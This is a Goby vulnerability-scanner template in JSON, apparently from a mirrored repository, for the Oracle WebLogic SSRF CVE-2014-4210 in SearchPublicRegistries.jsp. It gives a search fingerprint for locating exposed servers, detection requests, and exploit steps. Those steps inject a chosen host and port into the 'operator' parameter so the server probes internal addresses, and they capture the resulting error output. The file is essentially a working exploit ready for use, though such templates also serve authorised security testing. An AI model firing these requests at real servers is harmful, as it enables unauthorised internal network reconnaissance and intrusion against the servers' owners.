mirror of https://github.com/qwqdanchun/Goby.git
214 lines
9.9 KiB
JSON
214 lines
9.9 KiB
JSON
{
|
||
"Name": "Oracle Weblogic SearchPublicRegistries.jsp SSRF CVE-2014-4210",
|
||
"Level": "2",
|
||
"Tags": [],
|
||
"GobyQuery": "title=\"Search public registries\" || port=\"7001\" || body=\"Search public registries\" || app=\"Oracle-WeblogicPortal\" || app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"",
|
||
"Description": "Oracle WebLogic Server is the industry leading application server for building enterprise applications using Java EE standards, and deploying them on a reliable, scalable runtime with low cost of ownership. It is strategically integrated with Oracle’s full product and cloud service portfolio. Oracle WebLogic Server provides compatibility with prior versions, and supports new features for developer productivity, high availability, manageability and deployment to cloud native Kubernetes-based environments.",
|
||
"Product": "Oracle Weblogic",
|
||
"Homepage": "https://www.oracle.com/middleware/technologies/weblogic.html",
|
||
"Author": "",
|
||
"Impact": "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.",
|
||
"Recommendation": "",
|
||
"References": [
|
||
"https://www.oracle.com/security-alerts/cpujul2014.html",
|
||
"https://nvd.nist.gov/vuln/detail/CVE-2014-4210",
|
||
"https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html"
|
||
],
|
||
"HasExp": true,
|
||
"ExpParams": [
|
||
{
|
||
"Name": "payload",
|
||
"Type": "input",
|
||
"Value": "127.0.0.1:65535"
|
||
}
|
||
],
|
||
"ExpTips": {
|
||
"Type": "",
|
||
"Content": ""
|
||
},
|
||
"ScanSteps": [
|
||
"OR",
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:65535&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
|
||
"follow_redirect": false,
|
||
"header": null,
|
||
"data_type": "text",
|
||
"data": "",
|
||
"set_variable": []
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "but could not connect over HTTP to server",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:65535&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
|
||
"follow_redirect": false,
|
||
"header": null,
|
||
"data_type": "text",
|
||
"data": "",
|
||
"set_variable": []
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "returned a 404 error code",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:65535&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
|
||
"follow_redirect": false,
|
||
"header": null,
|
||
"data_type": "text",
|
||
"data": "",
|
||
"set_variable": []
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "did not have a valid SOAP content-type",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"ExploitSteps": [
|
||
"OR",
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
|
||
"follow_redirect": false,
|
||
"header": null,
|
||
"data_type": "text",
|
||
"data": "",
|
||
"set_variable": []
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"
|
||
]
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
|
||
"follow_redirect": false,
|
||
"header": null,
|
||
"data_type": "text",
|
||
"data": "",
|
||
"set_variable": []
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"
|
||
]
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
|
||
"follow_redirect": false,
|
||
"header": null,
|
||
"data_type": "text",
|
||
"data": "",
|
||
"set_variable": []
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"
|
||
]
|
||
}
|
||
],
|
||
"PostTime": "0000-00-00 00:00:00",
|
||
"GobyVersion": "0.0.0"
|
||
} |